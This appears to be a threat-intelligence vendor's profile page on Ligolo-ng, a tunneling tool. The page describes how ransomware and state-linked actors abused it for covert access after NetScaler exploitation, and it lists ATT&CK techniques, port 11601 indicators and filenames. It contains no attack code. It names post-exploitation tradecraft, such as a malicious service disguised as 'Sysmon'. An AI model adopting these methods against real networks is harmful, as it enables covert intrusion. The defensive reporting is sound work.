ligolo-ng
Ligolo-ng is an open-source tunneling and pivoting tool written in Go that provides encrypted reverse TCP/TLS connections to a remote host. It is a legitimate red-team/offensive security utility, but the provided reporting shows it being repeatedly repurposed for malicious post-exploitation activity to establish covert remote access, persistence, and internal network pivoting. Observed use cases include deployment by Akira ransomware operators via an NSSM-created malicious service named "Sysmon" to launch Ligolo-ng or Ngrok for remote access; post-exploitation on compromised Citrix NetScaler ADC/Gateway appliances following exploitation of CVE-2023-3519, where actors installed a persistent Ligolo-ng-derived tunneler and in some cases also used NPS and web shells such as SECRETSAUCE and REGEORG.NEO; use by operators targeting Ukrainian municipal and healthcare entities, where CERT-UA observed LIGOLO-NG and CHISEL used to build covert tunnels during UAC-0247 intrusions; and use in broader intrusion infrastructure including exposed C2 environments where a Ligolo-ng agent or proxy was staged or active. Multiple reports specifically note Ligolo-ng proxy activity on port 11601, including self-signed TLS certificates with subject or organization fields indicating Ligolo. Additional contexts tie Ligolo-ng to APT28-aligned Roundcube exploitation infrastructure, Silent Lynx activity, and Russian-hosted malicious infrastructure where it appeared alongside Sliver, Cobalt Strike, Tactical RMM, and other offensive frameworks repurposed for malicious use. High-confidence indicators directly mentioned in the content include filenames such as agent.exe and /var/tmp/the in Ligolo-ng-related deployments, execution from /tmp in one NetScaler case, and recurring network exposure on TCP port 11601 with self-signed TLS certificates associated with Ligolo.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
CISA is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell...
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Для побудови прихованих тунелей можуть використовуватися програмні засоби LIGOLO-NG та CHISEL.
Notably, port 11601 ran Ligolo-ng, a tunneling and pivoting tool popular in red team operations... used the C2 server as a pivot point for tunneling into compromised networks.
Techniques & procedures
12 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
Resource Development
Persistence
1 technique
Persistence
Privilege Escalation
1 technique
Privilege Escalation
Lateral Movement
1 technique
Lateral Movement
Command and Control
8 techniques
Command and Control
Over a three-month window from January 1 to April 1, 2026, more than 1,250 active command-and-control (C2) servers were detected across 165 Russian infrastructure providers.
In some cases, the LIGOLO-NG and CHISEL tools were deployed to build hidden network tunnels
launched tunneling tools such as Ngrok or Ligolo-ng to establish remote access to the compromised machines
MITRE ATT&CK Mapping ... Proxy: Multi-hop Proxy T1090.003 Ligolo-ng tunnel proxy
As part of their initial exploit chain [T1190], the threat actors uploaded a TGZ file [T1105] containing a generic webshell [T1505.003], discovery script [TA0007], and setuid binary [T1548.001] on the ADC appliance.
MITRE ATT&CK Mapping ... Non-Standard Port T1571 Ports 4040, 2083, 8181, 11601
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
8 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A tunneling/offensive security tool observed on the infrastructure and repurposed for malicious use.
A tunneling/proxy tool used to build covert tunnels within compromised environments.
A tunneling/pivoting utility used to route traffic into compromised environments; in this campaign it was exposed as a service on the operator infrastructure and used for network pivoting.
A legitimate tunneling/proxy tool used by the actor for persistence, lateral movement, and infrastructure administration through TLS 1.3 multiplexed tunnels.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.